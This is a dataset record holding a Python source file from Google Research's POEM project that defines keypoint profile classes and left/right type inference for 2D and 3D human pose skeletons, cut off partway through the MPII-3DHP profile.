repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
google-research/google-research | poem/core/keypoint_profiles.py | 1 | 48752 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Keypoint profile class and utility functions."""
import abc
import enum
import six
import tensorflow as tf
from poem.core import keypoint_utils
class LeftRightType(enum.Enum):
"""Keypoint/segment left/right type."""
UNKNOWN = 0
CENTRAL = 1
LEFT = 2
RIGHT = 3
def infer_keypoint_left_right_type(left_right_types, indices):
"""Infers keypoint left/right type.
The inferred left/right type is decided as follows:
1. If either type is UNKNOWN, returns UNKNOWN.
2. If both types are the same, returns this type.
3. If one type is CENTRAL, and the other type is LEFT or RIGHT, returns the
other type.
4. If one type is LEFT and the other type is RIGHT, returns CENTRAL.
Args:
left_right_types: A list of LeftRightType enum values for all keypoints.
indices: A list of integers for keypoint indices.
Returns:
A LeftRightType enum value for inferred type.
Raises:
ValueError: If any index is out of range.
"""
if not indices:
return LeftRightType.UNKNOWN
def lookup(i):
if i < 0 or i >= len(left_right_types):
raise ValueError('Left/right type index is out of range: %d.' % i)
return left_right_types[i]
if len(indices) == 1:
return lookup(indices[0])
output_type = LeftRightType.CENTRAL
for i in indices:
current_type = lookup(i)
if current_type == LeftRightType.UNKNOWN:
return LeftRightType.UNKNOWN
if output_type == LeftRightType.CENTRAL:
output_type = current_type
elif current_type != LeftRightType.CENTRAL and current_type != output_type:
output_type = LeftRightType.CENTRAL
return output_type
def infer_segment_left_right_type(left_right_types, start_indices, end_indices):
"""Infers segment left/right type.
The inferred left/right type is decided as follows:
1. If either type is UNKNOWN, returns UNKNOWN.
2. If both types are the same, returns this type.
3. If one type is CENTRAL, and the other type is LEFT or RIGHT, returns the
other type.
4. If one type is LEFT and the other type is RIGHT, returns CENTRAL.
Args:
left_right_types: A list of LeftRightType enum values for all keypoints.
start_indices: A list of integers for LHS keypoint indices.
end_indices: A list of integers for RHS keypoint indices.
Returns:
A LeftRightType enum value for inferred type.
"""
lhs_type = infer_keypoint_left_right_type(left_right_types, start_indices)
rhs_type = infer_keypoint_left_right_type(left_right_types, end_indices)
if lhs_type == LeftRightType.UNKNOWN or rhs_type == LeftRightType.UNKNOWN:
return LeftRightType.UNKNOWN
if lhs_type == LeftRightType.CENTRAL:
return rhs_type
if rhs_type == LeftRightType.CENTRAL:
return lhs_type
return lhs_type if lhs_type == rhs_type else LeftRightType.CENTRAL
class KeypointProfile(six.with_metaclass(abc.ABCMeta, object)):
"""Keypoint profile base class."""
def __init__(self,
name,
keypoint_names,
offset_keypoint_names,
scale_keypoint_name_pairs,
scale_distance_reduction_fn,
scale_unit,
segment_name_pairs,
head_keypoint_name=None,
neck_keypoint_name=None,
left_shoulder_keypoint_name=None,
right_shoulder_keypoint_name=None,
left_elbow_keypoint_name=None,
right_elbow_keypoint_name=None,
left_wrist_keypoint_name=None,
right_wrist_keypoint_name=None,
spine_keypoint_name=None,
pelvis_keypoint_name=None,
left_hip_keypoint_name=None,
right_hip_keypoint_name=None,
left_knee_keypoint_name=None,
right_knee_keypoint_name=None,
left_ankle_keypoint_name=None,
right_ankle_keypoint_name=None):
"""Initializer."""
self._name = name
self._keypoint_names = [name for name, _ in keypoint_names]
self._keypoint_left_right_types = [
left_right_type for _, left_right_type in keypoint_names
]
self._offset_keypoint_index = [
self._keypoint_names.index(keypoint_name)
for keypoint_name in offset_keypoint_names
]
self._scale_keypoint_index_pairs = []
for start_names, end_names in scale_keypoint_name_pairs:
self._scale_keypoint_index_pairs.append(
([self._keypoint_names.index(name) for name in start_names],
[self._keypoint_names.index(name) for name in end_names]))
self._scale_distance_reduction_fn = scale_distance_reduction_fn
self._scale_unit = scale_unit
self._segment_index_pairs = []
for start_names, end_names in segment_name_pairs:
self._segment_index_pairs.append(
([self._keypoint_names.index(name) for name in start_names],
[self._keypoint_names.index(name) for name in end_names]))
self._head_keypoint_name = head_keypoint_name
self._neck_keypoint_name = neck_keypoint_name
self._left_shoulder_keypoint_name = left_shoulder_keypoint_name
self._right_shoulder_keypoint_name = right_shoulder_keypoint_name
self._left_elbow_keypoint_name = left_elbow_keypoint_name
self._right_elbow_keypoint_name = right_elbow_keypoint_name
self._left_wrist_keypoint_name = left_wrist_keypoint_name
self._right_wrist_keypoint_name = right_wrist_keypoint_name
self._spine_keypoint_name = spine_keypoint_name
self._pelvis_keypoint_name = pelvis_keypoint_name
self._left_hip_keypoint_name = left_hip_keypoint_name
self._right_hip_keypoint_name = right_hip_keypoint_name
self._left_knee_keypoint_name = left_knee_keypoint_name
self._right_knee_keypoint_name = right_knee_keypoint_name
self._left_ankle_keypoint_name = left_ankle_keypoint_name
self._right_ankle_keypoint_name = right_ankle_keypoint_name
@property
def name(self):
"""Gets keypoint profile name."""
return self._name
@property
def keypoint_names(self):
"""Gets keypoint names."""
return self._keypoint_names
@property
@abc.abstractmethod
def keypoint_dim(self):
"""Gets keypoint dimensionality."""
raise NotImplementedError
@property
def keypoint_num(self):
"""Gets number of keypoints."""
return len(self._keypoint_names)
def keypoint_left_right_type(self, keypoint_index):
"""Gets keypoint left/right type given index."""
if isinstance(keypoint_index, int):
keypoint_index = [keypoint_index]
return infer_keypoint_left_right_type(self._keypoint_left_right_types,
keypoint_index)
def segment_left_right_type(self, start_index, end_index):
"""Gets segment left/right type given index."""
if isinstance(start_index, int):
start_index = [start_index]
if isinstance(end_index, int):
end_index = [end_index]
return infer_segment_left_right_type(self._keypoint_left_right_types,
start_index, end_index)
@property
def offset_keypoint_index(self):
"""Gets offset keypoint index."""
return self._offset_keypoint_index
@property
def scale_keypoint_index_pairs(self):
"""Gets scale keypoint index pairs."""
return self._scale_keypoint_index_pairs
@property
def scale_unit(self):
"""Gets scale unit."""
return self._scale_unit
@property
def segment_index_pairs(self):
"""Gets segment index pairs."""
return self._segment_index_pairs
@property
def keypoint_affinity_matrix(self):
"""Gets keypoint affinity matrix.
If a segment has multi-point end, all pairs of relevant points are
considered as in affinity.
Returns:
matrix: A double list of floats for the keypoint affinity matrix.
Raises:
ValueError: If affinity matrix has any isolated node.
"""
matrix = [[0.0
for _ in range(self.keypoint_num)]
for _ in range(self.keypoint_num)]
# Self-affinity.
for i in range(self.keypoint_num):
matrix[i][i] = 1.0
for lhs_index, rhs_index in self._segment_index_pairs:
for i in lhs_index:
for j in lhs_index:
matrix[i][j] = 1.0
matrix[j][i] = 1.0
for i in rhs_index:
for j in rhs_index:
matrix[i][j] = 1.0
matrix[j][i] = 1.0
for i in lhs_index:
for j in rhs_index:
matrix[i][j] = 1.0
matrix[j][i] = 1.0
# Check if the affinity matrix is valid, i.e., each node must have degree
# greater than 1 (no isolated node).
for row in matrix:
if sum(row) <= 1.0:
raise ValueError(
'Affinity matrix has a node with degree less than 2: %s.' %
str(matrix))
return matrix
def keypoint_index(self, keypoint_name, raise_error_if_not_found=False):
"""Gets keypoint index given name.
If `raise_error_if_not_found` is True, raises ValueError if keypoint does
not exist. Otherwise, returns -1 if keypoint does not exist.
Args:
keypoint_name: A string for keypoint name to find index of.
raise_error_if_not_found: A boolean for whether to raise ValueError if
keypoint does not exist.
Returns:
An integer for keypoint index.
Raises:
ValueError: If keypoint does not exist and `raise_error_if_not_found` is
True.
"""
if keypoint_name in self._keypoint_names:
return self._keypoint_names.index(keypoint_name)
if raise_error_if_not_found:
raise ValueError('Failed to find keypoint: `%s`.' % str(keypoint_name))
return -1
@property
def head_keypoint_index(self):
"""Gets head keypoint index."""
if not self._head_keypoint_name:
raise ValueError('Head keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._head_keypoint_name
]
@property
def neck_keypoint_index(self):
"""Gets neck keypoint index."""
if not self._neck_keypoint_name:
raise ValueError('Neck keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._neck_keypoint_name
]
@property
def left_shoulder_keypoint_index(self):
"""Gets left shoulder keypoint index."""
if not self._left_shoulder_keypoint_name:
raise ValueError('Left shoulder keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._left_shoulder_keypoint_name
]
@property
def right_shoulder_keypoint_index(self):
"""Gets right shoulder keypoint index."""
if not self._right_shoulder_keypoint_name:
raise ValueError('Right shoulder keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._right_shoulder_keypoint_name
]
@property
def left_elbow_keypoint_index(self):
"""Gets left elbow keypoint index."""
if not self._left_elbow_keypoint_name:
raise ValueError('Left elbow keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._left_elbow_keypoint_name
]
@property
def right_elbow_keypoint_index(self):
"""Gets right elbow keypoint index."""
if not self._right_elbow_keypoint_name:
raise ValueError('Right elbow keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._right_elbow_keypoint_name
]
@property
def left_wrist_keypoint_index(self):
"""Gets left wrist keypoint index."""
if not self._left_wrist_keypoint_name:
raise ValueError('Left wrist keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._left_wrist_keypoint_name
]
@property
def right_wrist_keypoint_index(self):
"""Gets right wrist keypoint index."""
if not self._right_wrist_keypoint_name:
raise ValueError('Right wrist keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._right_wrist_keypoint_name
]
@property
def spine_keypoint_index(self):
"""Gets spine keypoint index."""
if not self._spine_keypoint_name:
raise ValueError('Spine keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._spine_keypoint_name
]
@property
def pelvis_keypoint_index(self):
"""Gets pelvis keypoint index."""
if not self._pelvis_keypoint_name:
raise ValueError('Pelvis keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._pelvis_keypoint_name
]
@property
def left_hip_keypoint_index(self):
"""Gets left hip keypoint index."""
if not self._left_hip_keypoint_name:
raise ValueError('Left hip keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._left_hip_keypoint_name
]
@property
def right_hip_keypoint_index(self):
"""Gets right hip keypoint index."""
if not self._right_hip_keypoint_name:
raise ValueError('Right hip keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._right_hip_keypoint_name
]
@property
def left_knee_keypoint_index(self):
"""Gets left knee keypoint index."""
if not self._left_knee_keypoint_name:
raise ValueError('Left knee keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._left_knee_keypoint_name
]
@property
def right_knee_keypoint_index(self):
"""Gets right knee keypoint index."""
if not self._right_knee_keypoint_name:
raise ValueError('Right knee keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._right_knee_keypoint_name
]
@property
def left_ankle_keypoint_index(self):
"""Gets left ankle keypoint index."""
if not self._left_ankle_keypoint_name:
raise ValueError('Left ankle keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._left_ankle_keypoint_name
]
@property
def right_ankle_keypoint_index(self):
"""Gets right ankle keypoint index."""
if not self._right_ankle_keypoint_name:
raise ValueError('Right ankle keypoint is not specified.')
return [
self.keypoint_index(name, raise_error_if_not_found=True)
for name in self._right_ankle_keypoint_name
]
@property
def standard_part_names(self):
"""Gets all standard part names."""
return [
'HEAD', 'NECK', 'LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_ELBOW',
'RIGHT_ELBOW', 'LEFT_WRIST', 'RIGHT_WRIST', 'SPINE', 'PELVIS',
'LEFT_HIP', 'RIGHT_HIP', 'LEFT_KNEE', 'RIGHT_KNEE', 'LEFT_ANKLE',
'RIGHT_ANKLE'
]
def get_standard_part_index(self, part_name):
"""Gets part index by standardized name."""
if part_name.upper() == 'HEAD':
return self.head_keypoint_index
if part_name.upper() == 'NECK':
return self.neck_keypoint_index
if part_name.upper() == 'LEFT_SHOULDER':
return self.left_shoulder_keypoint_index
if part_name.upper() == 'RIGHT_SHOULDER':
return self.right_shoulder_keypoint_index
if part_name.upper() == 'LEFT_ELBOW':
return self.left_elbow_keypoint_index
if part_name.upper() == 'RIGHT_ELBOW':
return self.right_elbow_keypoint_index
if part_name.upper() == 'LEFT_WRIST':
return self.left_wrist_keypoint_index
if part_name.upper() == 'RIGHT_WRIST':
return self.right_wrist_keypoint_index
if part_name.upper() == 'SPINE':
return self.spine_keypoint_index
if part_name.upper() == 'PELVIS':
return self.pelvis_keypoint_index
if part_name.upper() == 'LEFT_HIP':
return self.left_hip_keypoint_index
if part_name.upper() == 'RIGHT_HIP':
return self.right_hip_keypoint_index
if part_name.upper() == 'LEFT_KNEE':
return self.left_knee_keypoint_index
if part_name.upper() == 'RIGHT_KNEE':
return self.right_knee_keypoint_index
if part_name.upper() == 'LEFT_ANKLE':
return self.left_ankle_keypoint_index
if part_name.upper() == 'RIGHT_ANKLE':
return self.right_ankle_keypoint_index
raise ValueError('Unsupported part name: `%s`.' % part_name)
def normalize(self, keypoints, keypoint_masks=None):
"""Normalizes keypoints."""
del keypoint_masks
return keypoint_utils.normalize_points(
keypoints,
offset_point_indices=self._offset_keypoint_index,
scale_distance_point_index_pairs=self._scale_keypoint_index_pairs,
scale_distance_reduction_fn=self._scale_distance_reduction_fn,
scale_unit=self._scale_unit)
def denormalize(self,
normalized_keypoints,
offset_points,
scale_distances,
keypoint_masks=None):
"""Denormalizes keypoints."""
del keypoint_masks
return (normalized_keypoints / self._scale_unit * scale_distances +
offset_points)
class KeypointProfile3D(KeypointProfile):
"""3D keypoint profile base class."""
def __init__(self,
name,
keypoint_names,
offset_keypoint_names,
scale_keypoint_name_pairs,
segment_name_pairs,
scale_distance_reduction_fn=tf.math.reduce_sum,
scale_unit=1.0,
head_keypoint_name=None,
neck_keypoint_name=None,
left_shoulder_keypoint_name=None,
right_shoulder_keypoint_name=None,
left_elbow_keypoint_name=None,
right_elbow_keypoint_name=None,
left_wrist_keypoint_name=None,
right_wrist_keypoint_name=None,
spine_keypoint_name=None,
pelvis_keypoint_name=None,
left_hip_keypoint_name=None,
right_hip_keypoint_name=None,
left_knee_keypoint_name=None,
right_knee_keypoint_name=None,
left_ankle_keypoint_name=None,
right_ankle_keypoint_name=None):
"""Initializer."""
super(KeypointProfile3D, self).__init__(
name=name,
keypoint_names=keypoint_names,
offset_keypoint_names=offset_keypoint_names,
scale_keypoint_name_pairs=scale_keypoint_name_pairs,
scale_distance_reduction_fn=scale_distance_reduction_fn,
scale_unit=scale_unit,
segment_name_pairs=segment_name_pairs,
head_keypoint_name=head_keypoint_name,
neck_keypoint_name=neck_keypoint_name,
left_shoulder_keypoint_name=left_shoulder_keypoint_name,
right_shoulder_keypoint_name=right_shoulder_keypoint_name,
left_elbow_keypoint_name=left_elbow_keypoint_name,
right_elbow_keypoint_name=right_elbow_keypoint_name,
left_wrist_keypoint_name=left_wrist_keypoint_name,
right_wrist_keypoint_name=right_wrist_keypoint_name,
spine_keypoint_name=spine_keypoint_name,
pelvis_keypoint_name=pelvis_keypoint_name,
left_hip_keypoint_name=left_hip_keypoint_name,
right_hip_keypoint_name=right_hip_keypoint_name,
left_knee_keypoint_name=left_knee_keypoint_name,
right_knee_keypoint_name=right_knee_keypoint_name,
left_ankle_keypoint_name=left_ankle_keypoint_name,
right_ankle_keypoint_name=right_ankle_keypoint_name)
@property
def keypoint_dim(self):
"""Gets keypoint dimensionality."""
return 3
class KeypointProfile2D(KeypointProfile):
"""2D keypoint profile base class."""
def __init__(self,
name,
keypoint_names,
offset_keypoint_names,
scale_keypoint_name_pairs,
segment_name_pairs,
compatible_keypoint_name_dict=None,
scale_distance_reduction_fn=tf.math.reduce_max,
scale_unit=0.5,
head_keypoint_name=None,
neck_keypoint_name=None,
left_shoulder_keypoint_name=None,
right_shoulder_keypoint_name=None,
left_elbow_keypoint_name=None,
right_elbow_keypoint_name=None,
left_wrist_keypoint_name=None,
right_wrist_keypoint_name=None,
spine_keypoint_name=None,
pelvis_keypoint_name=None,
left_hip_keypoint_name=None,
right_hip_keypoint_name=None,
left_knee_keypoint_name=None,
right_knee_keypoint_name=None,
left_ankle_keypoint_name=None,
right_ankle_keypoint_name=None):
"""Initializer."""
super(KeypointProfile2D, self).__init__(
name=name,
keypoint_names=keypoint_names,
offset_keypoint_names=offset_keypoint_names,
scale_keypoint_name_pairs=scale_keypoint_name_pairs,
scale_distance_reduction_fn=scale_distance_reduction_fn,
scale_unit=scale_unit,
segment_name_pairs=segment_name_pairs,
head_keypoint_name=head_keypoint_name,
neck_keypoint_name=neck_keypoint_name,
left_shoulder_keypoint_name=left_shoulder_keypoint_name,
right_shoulder_keypoint_name=right_shoulder_keypoint_name,
left_elbow_keypoint_name=left_elbow_keypoint_name,
right_elbow_keypoint_name=right_elbow_keypoint_name,
left_wrist_keypoint_name=left_wrist_keypoint_name,
right_wrist_keypoint_name=right_wrist_keypoint_name,
spine_keypoint_name=spine_keypoint_name,
pelvis_keypoint_name=pelvis_keypoint_name,
left_hip_keypoint_name=left_hip_keypoint_name,
right_hip_keypoint_name=right_hip_keypoint_name,
left_knee_keypoint_name=left_knee_keypoint_name,
right_knee_keypoint_name=right_knee_keypoint_name,
left_ankle_keypoint_name=left_ankle_keypoint_name,
right_ankle_keypoint_name=right_ankle_keypoint_name)
self._compatible_keypoint_name_dict = {}
if compatible_keypoint_name_dict is not None:
for _, compatible_keypoint_names in compatible_keypoint_name_dict.items():
if len(compatible_keypoint_names) != len(self._keypoint_names):
raise ValueError('Compatible keypoint names must be of the same size '
'as keypoint names.')
self._compatible_keypoint_name_dict = compatible_keypoint_name_dict
@property
def keypoint_dim(self):
"""Gets keypoint dimensionality."""
return 2
@property
def compatible_keypoint_name_dict(self):
"""Gets compatible keypoint name dictionary."""
return self._compatible_keypoint_name_dict
class Std16KeypointProfile3D(KeypointProfile3D):
"""Standard 3D 16-keypoint profile."""
def __init__(self):
"""Initializer."""
super(Std16KeypointProfile3D,
self).__init__(
name='3DSTD16',
keypoint_names=[('HEAD', LeftRightType.CENTRAL),
('NECK', LeftRightType.CENTRAL),
('LEFT_SHOULDER', LeftRightType.LEFT),
('RIGHT_SHOULDER', LeftRightType.RIGHT),
('LEFT_ELBOW', LeftRightType.LEFT),
('RIGHT_ELBOW', LeftRightType.RIGHT),
('LEFT_WRIST', LeftRightType.LEFT),
('RIGHT_WRIST', LeftRightType.RIGHT),
('SPINE', LeftRightType.CENTRAL),
('PELVIS', LeftRightType.CENTRAL),
('LEFT_HIP', LeftRightType.LEFT),
('RIGHT_HIP', LeftRightType.RIGHT),
('LEFT_KNEE', LeftRightType.LEFT),
('RIGHT_KNEE', LeftRightType.RIGHT),
('LEFT_ANKLE', LeftRightType.LEFT),
('RIGHT_ANKLE', LeftRightType.RIGHT)],
offset_keypoint_names=['PELVIS'],
scale_keypoint_name_pairs=[(['NECK'], ['SPINE']),
(['SPINE'], ['PELVIS'])],
segment_name_pairs=[(['HEAD'], ['NECK']),
(['NECK'], ['LEFT_SHOULDER']),
(['NECK'], ['RIGHT_SHOULDER']),
(['NECK'], ['SPINE']),
(['LEFT_SHOULDER'], ['LEFT_ELBOW']),
(['RIGHT_SHOULDER'], ['RIGHT_ELBOW']),
(['LEFT_ELBOW'], ['LEFT_WRIST']),
(['RIGHT_ELBOW'], ['RIGHT_WRIST']),
(['SPINE'], ['PELVIS']),
(['PELVIS'], ['LEFT_HIP']),
(['PELVIS'], ['RIGHT_HIP']),
(['LEFT_HIP'], ['LEFT_KNEE']),
(['RIGHT_HIP'], ['RIGHT_KNEE']),
(['LEFT_KNEE'], ['LEFT_ANKLE']),
(['RIGHT_KNEE'], ['RIGHT_ANKLE'])],
head_keypoint_name=['HEAD'],
neck_keypoint_name=['NECK'],
left_shoulder_keypoint_name=['LEFT_SHOULDER'],
right_shoulder_keypoint_name=['RIGHT_SHOULDER'],
left_elbow_keypoint_name=['LEFT_ELBOW'],
right_elbow_keypoint_name=['RIGHT_ELBOW'],
left_wrist_keypoint_name=['LEFT_WRIST'],
right_wrist_keypoint_name=['RIGHT_WRIST'],
spine_keypoint_name=['SPINE'],
pelvis_keypoint_name=['PELVIS'],
left_hip_keypoint_name=['LEFT_HIP'],
right_hip_keypoint_name=['RIGHT_HIP'],
left_knee_keypoint_name=['LEFT_KNEE'],
right_knee_keypoint_name=['RIGHT_KNEE'],
left_ankle_keypoint_name=['LEFT_ANKLE'],
right_ankle_keypoint_name=['RIGHT_ANKLE'])
class Std13KeypointProfile3D(KeypointProfile3D):
"""Standard 3D 13-keypoint profile."""
def __init__(self):
"""Initializer."""
super(Std13KeypointProfile3D, self).__init__(
name='3DSTD13',
keypoint_names=[('HEAD', LeftRightType.CENTRAL),
('LEFT_SHOULDER', LeftRightType.LEFT),
('RIGHT_SHOULDER', LeftRightType.RIGHT),
('LEFT_ELBOW', LeftRightType.LEFT),
('RIGHT_ELBOW', LeftRightType.RIGHT),
('LEFT_WRIST', LeftRightType.LEFT),
('RIGHT_WRIST', LeftRightType.RIGHT),
('LEFT_HIP', LeftRightType.LEFT),
('RIGHT_HIP', LeftRightType.RIGHT),
('LEFT_KNEE', LeftRightType.LEFT),
('RIGHT_KNEE', LeftRightType.RIGHT),
('LEFT_ANKLE', LeftRightType.LEFT),
('RIGHT_ANKLE', LeftRightType.RIGHT)],
offset_keypoint_names=['LEFT_HIP', 'RIGHT_HIP'],
scale_keypoint_name_pairs=[(['LEFT_SHOULDER', 'RIGHT_SHOULDER'],
['LEFT_HIP', 'RIGHT_HIP'])],
segment_name_pairs=[
(['HEAD'], ['LEFT_SHOULDER', 'RIGHT_SHOULDER']),
(['LEFT_SHOULDER', 'RIGHT_SHOULDER'], ['LEFT_SHOULDER']),
(['LEFT_SHOULDER', 'RIGHT_SHOULDER'], ['RIGHT_SHOULDER']),
(['LEFT_SHOULDER', 'RIGHT_SHOULDER'],
['LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_HIP', 'RIGHT_HIP']),
(['LEFT_SHOULDER'], ['LEFT_ELBOW']),
(['RIGHT_SHOULDER'], ['RIGHT_ELBOW']),
(['LEFT_ELBOW'], ['LEFT_WRIST']),
(['RIGHT_ELBOW'], ['RIGHT_WRIST']),
(['LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_HIP',
'RIGHT_HIP'], ['LEFT_HIP', 'RIGHT_HIP']),
(['LEFT_HIP', 'RIGHT_HIP'], ['LEFT_HIP']),
(['LEFT_HIP', 'RIGHT_HIP'], ['RIGHT_HIP']),
(['LEFT_HIP'], ['LEFT_KNEE']), (['RIGHT_HIP'], ['RIGHT_KNEE']),
(['LEFT_KNEE'], ['LEFT_ANKLE']), (['RIGHT_KNEE'], ['RIGHT_ANKLE'])
],
head_keypoint_name=['HEAD'],
neck_keypoint_name=['LEFT_SHOULDER', 'RIGHT_SHOULDER'],
left_shoulder_keypoint_name=['LEFT_SHOULDER'],
right_shoulder_keypoint_name=['RIGHT_SHOULDER'],
left_elbow_keypoint_name=['LEFT_ELBOW'],
right_elbow_keypoint_name=['RIGHT_ELBOW'],
left_wrist_keypoint_name=['LEFT_WRIST'],
right_wrist_keypoint_name=['RIGHT_WRIST'],
spine_keypoint_name=[
'LEFT_SHOULDER', 'RIGHT_SHOULDER', 'LEFT_HIP', 'RIGHT_HIP'
],
pelvis_keypoint_name=['LEFT_HIP', 'RIGHT_HIP'],
left_hip_keypoint_name=['LEFT_HIP'],
right_hip_keypoint_name=['RIGHT_HIP'],
left_knee_keypoint_name=['LEFT_KNEE'],
right_knee_keypoint_name=['RIGHT_KNEE'],
left_ankle_keypoint_name=['LEFT_ANKLE'],
right_ankle_keypoint_name=['RIGHT_ANKLE'])
class LegacyH36m17KeypointProfile3D(KeypointProfile3D):
"""Legacy Human3.6M 3D 17-keypoint profile."""
def __init__(self):
"""Initializer."""
super(LegacyH36m17KeypointProfile3D, self).__init__(
name='LEGACY_3DH36M17',
keypoint_names=[('Hip', LeftRightType.CENTRAL),
('Head', LeftRightType.CENTRAL),
('Neck/Nose', LeftRightType.CENTRAL),
('Thorax', LeftRightType.CENTRAL),
('LShoulder', LeftRightType.LEFT),
('RShoulder', LeftRightType.RIGHT),
('LElbow', LeftRightType.LEFT),
('RElbow', LeftRightType.RIGHT),
('LWrist', LeftRightType.LEFT),
('RWrist', LeftRightType.RIGHT),
('Spine', LeftRightType.CENTRAL),
('LHip', LeftRightType.LEFT),
('RHip', LeftRightType.RIGHT),
('LKnee', LeftRightType.LEFT),
('RKnee', LeftRightType.RIGHT),
('LFoot', LeftRightType.LEFT),
('RFoot', LeftRightType.RIGHT)],
offset_keypoint_names=['Hip'],
scale_keypoint_name_pairs=[(['Hip'], ['Spine']),
(['Spine'], ['Thorax'])],
segment_name_pairs=[(['Hip'], ['Spine']), (['Hip'], ['LHip']),
(['Hip'], ['RHip']), (['Spine'], ['Thorax']),
(['LHip'], ['LKnee']), (['RHip'], ['RKnee']),
(['LKnee'], ['LFoot']), (['RKnee'], ['RFoot']),
(['Thorax'], ['Neck/Nose']),
(['Thorax'], ['LShoulder']),
(['Thorax'], ['RShoulder']),
(['Neck/Nose'], ['Head']),
(['LShoulder'], ['LElbow']),
(['RShoulder'], ['RElbow']),
(['LElbow'], ['LWrist']), (['RElbow'], ['RWrist'])],
head_keypoint_name=['Head'],
neck_keypoint_name=['Thorax'],
left_shoulder_keypoint_name=['LShoulder'],
right_shoulder_keypoint_name=['RShoulder'],
left_elbow_keypoint_name=['LElbow'],
right_elbow_keypoint_name=['RElbow'],
left_wrist_keypoint_name=['LWrist'],
right_wrist_keypoint_name=['RWrist'],
spine_keypoint_name=['Spine'],
pelvis_keypoint_name=['Hip'],
left_hip_keypoint_name=['LHip'],
right_hip_keypoint_name=['RHip'],
left_knee_keypoint_name=['LKnee'],
right_knee_keypoint_name=['RKnee'],
left_ankle_keypoint_name=['LFoot'],
right_ankle_keypoint_name=['RFoot'])
class LegacyH36m13KeypointProfile3D(KeypointProfile3D):
"""Legacy Human3.6M 3D 13-keypoint profile."""
def __init__(self):
"""Initializer."""
super(LegacyH36m13KeypointProfile3D, self).__init__(
name='LEGACY_3DH36M13',
keypoint_names=[('Head', LeftRightType.CENTRAL),
('LShoulder', LeftRightType.LEFT),
('RShoulder', LeftRightType.RIGHT),
('LElbow', LeftRightType.LEFT),
('RElbow', LeftRightType.RIGHT),
('LWrist', LeftRightType.LEFT),
('RWrist', LeftRightType.RIGHT),
('LHip', LeftRightType.LEFT),
('RHip', LeftRightType.RIGHT),
('LKnee', LeftRightType.LEFT),
('RKnee', LeftRightType.RIGHT),
('LFoot', LeftRightType.LEFT),
('RFoot', LeftRightType.RIGHT)],
offset_keypoint_names=['LHip'],
scale_keypoint_name_pairs=[
(['LHip', 'RHip'], ['LShoulder', 'RShoulder']),
],
segment_name_pairs=[(['LHip', 'RHip'], ['LShoulder', 'RShoulder']),
(['LHip', 'RHip'], ['LHip']),
(['LHip', 'RHip'], ['RHip']), (['LHip'], ['LKnee']),
(['RHip'], ['RKnee']), (['LKnee'], ['LFoot']),
(['RKnee'], ['RFoot']),
(['LShoulder', 'RShoulder'], ['Head']),
(['LShoulder', 'RShoulder'], ['LShoulder']),
(['LShoulder', 'RShoulder'], ['RShoulder']),
(['LShoulder'], ['LElbow']),
(['RShoulder'], ['RElbow']),
(['LElbow'], ['LWrist']), (['RElbow'], ['RWrist'])],
head_keypoint_name=['Head'],
neck_keypoint_name=['LShoulder', 'RShoulder'],
left_shoulder_keypoint_name=['LShoulder'],
right_shoulder_keypoint_name=['RShoulder'],
left_elbow_keypoint_name=['LElbow'],
right_elbow_keypoint_name=['RElbow'],
left_wrist_keypoint_name=['LWrist'],
right_wrist_keypoint_name=['RWrist'],
spine_keypoint_name=['LShoulder', 'RShoulder', 'LHip', 'RHip'],
pelvis_keypoint_name=['LHip', 'RHip'],
left_hip_keypoint_name=['LHip'],
right_hip_keypoint_name=['RHip'],
left_knee_keypoint_name=['LKnee'],
right_knee_keypoint_name=['RKnee'],
left_ankle_keypoint_name=['LFoot'],
right_ankle_keypoint_name=['RFoot'])
class LegacyMpii3dhp17KeypointProfile3D(KeypointProfile3D):
"""Legacy MPII-3DHP 3D 17-keypoint profile."""
def __init__(self):
"""Initializer."""
super(LegacyMpii3dhp17KeypointProfile3D, self).__init__(
name='LEGACY_3DMPII3DHP17',
keypoint_names=[('pelvis', LeftRightType.CENTRAL),
('head', LeftRightType.CENTRAL),
('neck', LeftRightType.CENTRAL),
('head_top', LeftRightType.CENTRAL),
('left_shoulder', LeftRightType.LEFT),
('right_shoulder', LeftRightType.RIGHT),
('left_elbow', LeftRightType.LEFT),
('right_elbow', LeftRightType.RIGHT),
('left_wrist', LeftRightType.LEFT),
('right_wrist', LeftRightType.RIGHT),
('spine', LeftRightType.CENTRAL),
('left_hip', LeftRightType.LEFT),
('right_hip', LeftRightType.RIGHT),
